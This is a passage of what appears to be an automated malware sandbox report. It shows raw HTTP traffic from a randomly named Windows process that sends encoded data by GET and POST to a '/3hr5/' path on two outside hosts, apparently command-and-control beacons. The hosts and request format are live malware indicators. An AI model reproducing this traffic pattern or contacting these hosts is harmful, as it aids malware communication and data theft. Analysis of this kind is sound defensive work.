                                                                                                                              Data Ascii: TZd=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
                                                                                                                              Dec 4, 2023 15:23:45.682432890 CET6484OUTData Raw: 4e 33 43 31 7a 42 72 51 34 6b 75 76 32 37 62 38 32 4c 6d 5a 55 2b 69 55 6f 76 7a 73 65 38 39 66 6f 37 32 74 54 41 6f 38 2b 54 6e 47 6d 42 74 46 65 32 43 6f 6d 46 2f 70 76 47 64 59 6e 52 4b 46 36 44 77 46 79 71 68 65 63 35 7a 62 2f 61 46 64 36 61
                                                                                                                              Data Ascii: N3C1zBrQ4kuv27b82LmZU+iUovzse89fo72tTAo8+TnGmBtFe2ComF/pvGdYnRKF6DwFyqhec5zb/aFd6abkc4SLJa7Hg4nvq0/Klrf3eOv9DsvK4+w5MKYF7YuQ9RUHb2U6HTAgvATYF8dsSh3CoGYOSPnHPlVfDirDFv1IaFmFo9Cd95vd0UYpIZgs+Dx3Z6+UgPHcSlG5tYtm62nh/17B/TvU0+jxTpzhRWv8+WnfnHqmsVH
                                                                                                                              Dec 4, 2023 15:23:45.799381971 CET1340OUTData Raw: 61 33 33 59 34 45 71 5a 66 68 42 51 4c 6e 52 54 2f 6d 6d 79 34 30 4c 2b 70 7a 48 2f 79 48 4b 55 5a 49 62 65 4f 2b 50 51 77 72 78 74 32 61 39 38 35 6d 34 34 75 4d 30 7a 71 52 53 68 42 5a 51 4e 53 4c 39 30 36 6c 33 64 74 58 73 64 77 68 38 66 4e 6b
                                                                                                                              Data Ascii: a33Y4EqZfhBQLnRT/mmy40L+pzH/yHKUZIbeO+PQwrxt2a985m44uM0zqRShBZQNSL906l3dtXsdwh8fNkUpj6zSpUqM4GfwsXhHIlvckydlNDdTzgsHaKtrKYCfhFw/vfg45Aln9wWHzQLtiy7zDA0IddK7YZJ6w/Kpy83N85Cuk4ZZzQgCW65oQSFneE0SacapoMSbtpVJY2bTsVHq/mG/y4E6tuJZwBf4zN9KYV8wu1dMl+0
                                                                                                                              Dec 4, 2023 15:23:45.799429893 CET3912OUTData Raw: 51 78 63 74 75 6d 4f 69 6f 70 52 76 2f 59 6d 73 71 6b 6b 79 34 41 36 59 78 52 46 37 67 77 77 67 66 64 70 6d 72 46 49 33 63 65 38 39 32 45 4d 42 2f 49 6d 4c 64 51 32 68 38 54 6f 6e 61 6c 31 65 4b 52 6d 38 38 75 62 56 38 4c 31 53 52 63 4f 35 51 32
                                                                                                                              Data Ascii: QxctumOiopRv/Ymsqkky4A6YxRF7gwwgfdpmrFI3ce892EMB/ImLdQ2h8Tonal1eKRm88ubV8L1SRcO5Q2Sr46wl7n0vDo1oSr4hToW/9wMAMBUDK005ItYOgRpaEEIvjxXI9xazM4+0khzlkNDoV9YiaWFk36jYYMd6CMg+P6j+n0EEssTuKQdIn/uk2fcDagkCCmopk30+1rfuZ4meBxFN7DapRpc/kVyveJZegC8ElWPp9eO
                                                                                                                              Dec 4, 2023 15:23:45.799479961 CET5198OUTData Raw: 33 57 4d 30 77 44 58 38 4e 78 46 4c 58 30 5a 76 37 42 67 33 66 64 63 53 31 6d 48 4f 69 52 44 63 30 58 50 68 6d 31 2f 72 34 4e 4b 55 70 6b 35 5a 79 74 4c 76 52 2b 41 72 41 62 32 31 5a 63 5a 68 72 55 5a 2f 41 6f 4c 54 2f 6f 7a 41 6b 4b 43 56 53 37
                                                                                                                              Data Ascii: 3WM0wDX8NxFLX0Zv7Bg3fdcS1mHOiRDc0XPhm1/r4NKUpk5ZytLvR+ArAb21ZcZhrUZ/AoLT/ozAkKCVS772v2orXreUEg9C0yWTzi9d9hMRGorWcW3Amo27gYhf7lawC4rABUX4evfjglil/8e2axelfOs75jZaml39QLAWIo9zMe1AXubOv3nb4QUZVNLIa4f1c5h0MKCw/vQc4YlILALeHHUE2MM28BsrQ7eozgh6or2V/G/
                                                                                                                              Dec 4, 2023 15:23:45.799825907 CET5198OUTData Raw: 73 39 32 49 55 75 43 58 75 34 4f 6a 30 55 54 47 53 6a 63 2b 58 30 7a 59 65 35 68 35 39 41 46 53 49 62 63 55 42 73 32 65 34 4e 69 6f 2f 50 72 50 53 68 49 68 33 45 48 4f 39 4f 43 76 43 54 4a 35 48 44 45 6a 4d 6b 38 62 7a 57 52 46 41 58 33 4d 42 2b
                                                                                                                              Data Ascii: s92IUuCXu4Oj0UTGSjc+X0zYe5h59AFSIbcUBs2e4Nio/PrPShIh3EHO9OCvCTJ5HDEjMk8bzWRFAX3MB+yW9E4VJXnPEBd/tGGocvZN/V7zCEgR0VoBDxMP6K1SPTpHNEF2HCFIYgbQJJsyTrJzwkHTdGLNA2d34tGwLbwEOVM+B1absWz44EyT52UxKD7CgHZ76xHNqyovkITLkjJhS5LQdUdCZ+MbdWL5QaK0OxwPq3TxlLJ
                                                                                                                              Dec 4, 2023 15:23:45.800110102 CET2626OUTData Raw: 68 6a 44 74 4b 31 41 59 64 45 6b 66 6e 62 2b 57 55 67 42 4d 6d 51 31 2b 54 77 4d 38 45 62 43 61 47 2b 41 71 66 58 39 36 74 47 45 66 4b 79 35 75 70 49 58 70 45 30 48 6a 39 6c 50 41 55 59 7a 4f 43 42 64 6f 31 33 5a 66 72 7a 79 31 46 51 74 4a 34 65
                                                                                                                              Data Ascii: hjDtK1AYdEkfnb+WUgBMmQ1+TwM8EbCaG+AqfX96tGEfKy5upIXpE0Hj9lPAUYzOCBdo13Zfrzy1FQtJ4ebVbSQT/ulpdDlRsw2h4Ki7siUo+hiUw7xeVqTrOQJeH+P/rIHh6XrDjQwpCmcwn+UdDQCrnKF9Xv8Qqr5cWuyY2f6KqZ9tlAQvO8GHBxHtpkjmO+NidVzZyMp0HHvAi+l2rDCzJmVEVap4uMw/XB+1p22lgIPfs+7
                                                                                                                              Dec 4, 2023 15:23:45.800241947 CET7770OUTData Raw: 7a 31 42 55 43 35 53 49 6c 2b 37 54 49 37 31 50 62 6a 77 38 63 73 69 41 6f 2b 33 75 7a 52 6c 46 62 78 58 75 33 71 66 59 49 48 65 33 6f 38 32 77 31 73 42 66 68 54 46 34 2b 47 48 4c 6c 2f 49 2b 62 46 31 72 31 4f 6b 30 36 6e 56 53 79 41 6a 66 2b 55
                                                                                                                              Data Ascii: z1BUC5SIl+7TI71Pbjw8csiAo+3uzRlFbxXu3qfYIHe3o82w1sBfhTF4+GHLl/I+bF1r1Ok06nVSyAjf+UgfRWUVaJF668xpsWWnC416Kqx5DH5WGrYelSGNM3OKB/eWa281Fh8VKWeu0GogRMq5qX+S22io+hKhbfvhf1GdvsgDZVquLWBC530Lei09QcFq7MV6ihwLhXtO1heeG66rEPCh4Bq/CUJdgx8grjBJw04j1v0z2iV
                                                                                                                              Dec 4, 2023 15:23:45.917016029 CET2626OUTData Raw: 77 4f 45 78 72 62 36 73 33 44 4d 70 41 78 56 69 58 73 73 75 68 63 4d 51 33 68 50 7a 49 64 33 66 6d 59 74 66 45 4e 69 77 64 46 75 55 46 35 57 43 6a 31 4b 6b 37 46 56 63 59 41 47 74 62 73 56 71 6b 48 71 37 59 6c 63 4e 6a 51 2b 74 54 61 44 47 62 48
                                                                                                                              Data Ascii: wOExrb6s3DMpAxViXssuhcMQ3hPzId3fmYtfENiwdFuUF5WCj1Kk7FVcYAGtbsVqkHq7YlcNjQ+tTaDGbHiDUuxu69arf4159AJWlC62JfkcSX8xbOIg7JWE3M6TznmqxPz7Xu7Qxv/M9G8mq7a/gcoqWqDb7ew9EIDpsJCWTSlb1pezt5IXjhVtFzqR/+Tvv5NIPln3pg5ryWZfIuQmREUNgNT1n7ogCUcCHUoTrKGpaXX4O9U
                                                                                                                              Dec 4, 2023 15:23:45.917139053 CET1340OUTData Raw: 6c 61 2b 77 53 57 5a 2b 65 79 2f 49 65 73 2f 77 38 49 36 54 64 31 6f 63 74 42 6c 70 76 75 38 44 72 4e 62 56 5a 4c 72 77 6d 30 55 71 44 30 39 33 4f 57 62 68 65 66 67 73 54 55 65 71 33 43 57 43 35 62 44 71 34 75 56 78 6b 72 70 50 38 35 39 73 64 68
                                                                                                                              Data Ascii: la+wSWZ+ey/Ies/w8I6Td1octBlpvu8DrNbVZLrwm0UqD093OWbhefgsTUeq3CWC5bDq4uVxkrpP859sdh6zMfS5OlRzO7IlET2D+Tz7WdMAyw4CdNlCMi2Q84ZIYmzDCrtSwn1UXxgdis5L1UrfnPfr4PYA2YZG02r9j8/CVlxMUKu243nZEn6rNF2VkD1TRmpkMsDUGN45m3N8bM/dmUhpvb6NVIyuVTUIuH/vSto0MQmMCrc
                                                                                                                              Dec 4, 2023 15:23:45.917320967 CET11123OUTData Raw: 73 6d 70 67 46 49 78 54 4b 58 32 45 51 4e 59 47 37 67 73 75 57 49 6d 43 43 74 42 37 4f 46 6b 76 52 4b 74 52 57 63 6e 64 30 49 44 33 37 66 76 57 65 79 56 4c 31 74 37 32 41 45 31 48 54 44 75 62 4a 5a 37 2f 6d 41 78 65 77 51 33 32 65 6b 7a 69 35 53
                                                                                                                              Data Ascii: smpgFIxTKX2EQNYG7gsuWImCCtB7OFkvRKtRWcnd0ID37fvWeyVL1t72AE1HTDubJZ7/mAxewQ32ekzi5SFe4Iu1k9doJLEhHWyT5ptGmX9P72uCzrRBKFSVrYFGx9hhMQmutCXmHZGPhvVA5z6MFN9qyYL7ipNNlH6wPfTPpK10/fZk63UE6qI79RFpUgmnLzIH+DG0X1cmcWTP/1tsVVb4thl+pdLZezj7rU4tK2mbzwtNNOT
                                                                                                                              Dec 4, 2023 15:23:46.155240059 CET1340INHTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 04 Dec 2023 14:23:45 GMT
                                                                                                                              Server: Apache
                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                              Link: <https://metodomestredojogo.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                              Upgrade: h2,h2c
                                                                                                                              Connection: Upgrade, close
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Content-Length: 6505
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 d5 52 db 72 1b 47 92 7d 16 bf a2 d4 8e 11 01 1b 7d c3 9d 20 41 c5 8c 2c 6f d8 31 5a 39 24 39 e6 c1 72 30 0a dd 89 ee 22 ab ab da 55 d5 b8 98 c3 8f 99 98 a7 f9 85 7d d5 8f 6d 56 37 6e 04 1b 24 2d 4a 11 bb 08 12 a8 ca ca cc 73 f2 e4 39 7b 1e cb c8 2c 73 20 a9 c9 f8 f9 d1 99 fd 21 9c 8a 64 ec e4 c6 fd db 3b c7 c6 80 c6 e7 47 cf ce 32 30 94 44 29 55 1a cc d8 f9 e5 c3 0f ee d0 d9 c4 05 cd 60 ec cc 18 cc 73 a9 8c 43 22 29 0c 08 cc 9b b3 d8 a4 e3 18 66 2c 02 b7 bc b4 08 13 cc 30 ca 5d 1d 51 0e e3 b0 ec c2 99 b8 22 0a 38 02 2b 39 65 1c 1c 92 2a 98 8e 9d d4 98 5c 8f 7c 3f c9 f2 c4 93 2a f1 17 53 e1 87 55 91 61 86 c3 f9 cf 9f fe 95 30 81 1c 3e fd 5b 12 10 16 5a d1 98 92 17 df 0c db 61 78 4a de 7c fa 8f 91 b1 24 6f 40 1b 05 04 4f 3f c9 44 9e f9 55 f5 d1 ce 00 c7 4a 4e a4 d1 c7 1b fa c7 19 5d b8 2c a3 09 b8 b9 02 3b de 88 53 95 c0 31 f1 b1 70 c3 f9 38 16 da 26 4c c1 44 e9 71 45 fc d8 f7 b1 31 e2 66 25 6c 2c 2f 11 d4 8b 64 b6 57 eb 50 6e 40 09 6a 70 62 bb 0a 0c e4 39 67 11 35 4c 0a 5f 69 fd dd 22 e3 f8 64 c9 8e 9d 1f 00 62 92 53 45 0f 4c 45 5e 28 fa 7b 21 4f f7 d5 ab a7 e2 4f b1 9d ef 3c 99 50 0c a8 58 86 82 7d fa 97 62 52 7f 41 82 f8 6f fb ea 5d a6 3a 52 2c 37 e7 47 73 26 62 39 f7 2e e6 39 64 f2 92 bd 07 63 98 48 34 19 93 6b 67 42 35 fc a2 b8 33 5a 01 7c f4 3f fa da 9b 5b 03 7d f4 cb 85 ea 8f d8 5c c1 47 bf 2c fe e8 87 5d 2f f0 82 8f fe a0 bd 18 b4 3f fa 4e cb 81 85 c1 7a 2f 17 09 5e f4 2c f9 bc 7e 58 58 76 c3 df d7 55 43 3c d9 bb 2c 54 04 ce e8 da 41 b3 a1 b8 65 d9 aa 7f d9 be 5e 91 8f fe 3c 77 99 88 78 11 5b c8 4b 5d 06 ca 62 17 b7 07 38 b7 97 31 e1 5d ea 97 33 50 e3 be d7 f5 42 e7 e6 e6 f4 c8 ff f6 39 f9 90 32 4d a6 8c 03 c1 5f 5a 18 e9 26 20 40 21 78 4c be f5 8f 9e 4f 0b 11 d9 2d 37 58 4b 34 af 67 54 11 d9 d2 2d 38 5d c7 49 d4 80 e6 b5 51 cb f2 cd 8c af 75 91 e7 52 99 0f 48 52 8f a0 65 98 a5 4b b3 7c d4 10 30 27 df 63 e3 a6 37 a3 bc 80 b7 d3 46 f3 e6 54 83 d6 d8 e6 bd 91 0a 15 f3 34 98 1f 71 ee 86 6c fd f4 fe ed 7f 7b 38 28 ee 8f 4d 97 0d d3 6c de a0 24 51 6a e1 6e 6e 36 f0 79 03 31 2c 35 f0 22 1c 55 bd 83 c8 34 82 56 d0 c2 3b 15 33 8a 1b 61 b1 49 b7 d7 14 58 92 9a 26 06 70 6a fe 01 37 da 30 98 1e 34 4f ab 01 2c cb 5f 98 30 9d f6 5f 95 a2 cb 06 78 09 72 b2 eb 44 ee f4 31 ad bd 18 13 9b 2d 35 6e 3c 81 93 28 39 b5 be 14 9b e6 a9 02 53 28 41 8c 07 68 82 65 63 b3 57 94 af 79 bd 7a 84 f1 78 ac 7e 35 bf dd 34 b7 02 17 6b 81 f5 9c 59 f9 31 3b 42 47 39 53 4e 13 67 b4 2a b4 6d 9c 8f 45 3c ec 44 f8 3d 9d 76 3e 16 53 08 a6 1f 8b 76 10 c4 f8 dd a7 83 2a e2 1c 4c 9b dc 4a 6b be 7c 1e 8e 9e df 6e 1b 4f e9 ce b9 e3 ec 3f 55 4d 76 12 9a 2f 5e 3c df 67 d6 c5 ef 49 37 c0 ef a8 3f d8 39 b7 77 ce bd 9d 33
                                                                                                                              Data Ascii: RrG}} A,o1Z9$9r0"U}mV7n$-Js9{,s !d;G20D)U`sC")f,0]Q"8+9e*\|?*SUa0>[ZaxJ|$o@O?DUJN],;S1p8&LDqE1f%l,/dWPn@jpb9g5L_i"dbSELE^({!OO<PX}bRAo]:R,7Gs&b9.9dcH4kgB53Z|?[}\G,]/?Nz/^,~XXvUC<,TAe^<wx[K]b81]3PB92M_Z& @!xLO-7XK4gT-8]IQuRHReK|0'c7FT4ql{8(Ml$Qjnn6y1,5"U4V;3aIX&pj704O,_0_xrD1-5n<(9S(AhecWyzx~54kY1;BG9SNg*mE<D=v>Sv*LJk|nO?UMv/^<gI7?9w3


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              16192.168.11.2050147108.179.192.34808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:23:48.320879936 CET540OUTGET /3hr5/?TZd=JbHlBWUudHwvZJwvAXOZDEBKgaTZSnA3HzZDUQLF8+dObUm02fdCsm6RYH22N3XnV4/Dw1x9sJd7kAxoLurayq/ALLHEWghrDA==&1dr=yP5PQD38 HTTP/1.1
                                                                                                                              Host: www.metodomestredojogo.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Dec 4, 2023 15:23:48.546039104 CET529INHTTP/1.1 301 Moved Permanently
                                                                                                                              Date: Mon, 04 Dec 2023 14:23:48 GMT
                                                                                                                              Server: Apache
                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                              X-Redirect-By: WordPress
                                                                                                                              Upgrade: h2,h2c
                                                                                                                              Connection: Upgrade, close
                                                                                                                              Location: http://metodomestredojogo.com/3hr5/?TZd=JbHlBWUudHwvZJwvAXOZDEBKgaTZSnA3HzZDUQLF8+dObUm02fdCsm6RYH22N3XnV4/Dw1x9sJd7kAxoLurayq/ALLHEWghrDA==&1dr=yP5PQD38
                                                                                                                              Content-Length: 0
                                                                                                                              Content-Type: text/html; charset=UTF-8


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              17192.168.11.2050148198.177.123.106808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:23:53.859838009 CET819OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.echolinkevolve.xyz
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.echolinkevolve.xyz
                                                                                                                              Referer: http://www.echolinkevolve.xyz/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 184
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 6a 41 4b 47 78 38 58 74 34 42 38 6a 6f 62 55 50 76 62 48 50 55 34 2b 63 63 62 70 4f 38 79 78 54 63 47 42 4f 35 57 4e 63 4f 6b 48 77 6d 63 41 50 6e 66 4c 58 39 67 6a 39 68 2b 78 56 71 6d 45 50 75 6d 70 48 77 6b 31 74 73 45 4e 5a 50 35 49 64 41 61 42 4d 77 47 34 64 34 72 32 6a 71 4f 58 30 57 46 31 71 4d 69 59 56 32 76 45 4c 6d 79 34 51 51 79 31 32 4a 52 58 39 54 49 74 36 69 4f 70 2f 6a 6a 47 2b 63 49 49 69 4b 4f 5a 41 38 65 64 6d 52 74 4f 75 4e 75 75 42 55 71 78 77 66 72 77 75 45 47 79 47 50 5a 4e 46 51 68 45 66 34 4f 42 51 37 77 3d 3d
                                                                                                                              Data Ascii: TZd=jAKGx8Xt4B8jobUPvbHPU4+ccbpO8yxTcGBO5WNcOkHwmcAPnfLX9gj9h+xVqmEPumpHwk1tsENZP5IdAaBMwG4d4r2jqOX0WF1qMiYV2vELmy4QQy12JRX9TIt6iOp/jjG+cIIiKOZA8edmRtOuNuuBUqxwfrwuEGyGPZNFQhEf4OBQ7w==
                                                                                                                              Dec 4, 2023 15:23:54.214494944 CET587INHTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 04 Dec 2023 14:23:53 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 389
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


